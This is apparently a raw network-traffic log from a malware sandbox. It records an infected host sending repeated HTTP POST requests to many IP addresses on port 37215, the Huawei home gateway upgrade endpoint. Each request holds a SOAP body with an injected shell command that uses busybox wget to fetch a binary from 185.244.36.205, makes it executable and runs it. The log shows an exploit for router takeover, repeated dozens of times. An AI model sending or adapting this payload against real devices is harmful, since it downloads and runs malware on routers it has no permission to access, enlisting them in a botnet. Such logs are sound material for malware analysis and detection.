                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1846192.168.2.1552054157.50.18.19437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947894096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1847192.168.2.1554092156.64.231.17337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947936058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1848192.168.2.155080441.251.251.21337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947938919 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1849192.168.2.153720045.4.196.18137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947954893 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1850192.168.2.155248045.25.136.1437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947974920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1851192.168.2.1543668156.159.108.5137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.947992086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1852192.168.2.1552798190.211.95.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948009014 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1853192.168.2.154954841.184.172.7337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948029041 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1854192.168.2.1537370181.114.35.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948045969 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1855192.168.2.155229241.15.113.8937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948069096 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1856192.168.2.1538366121.137.36.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948101044 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
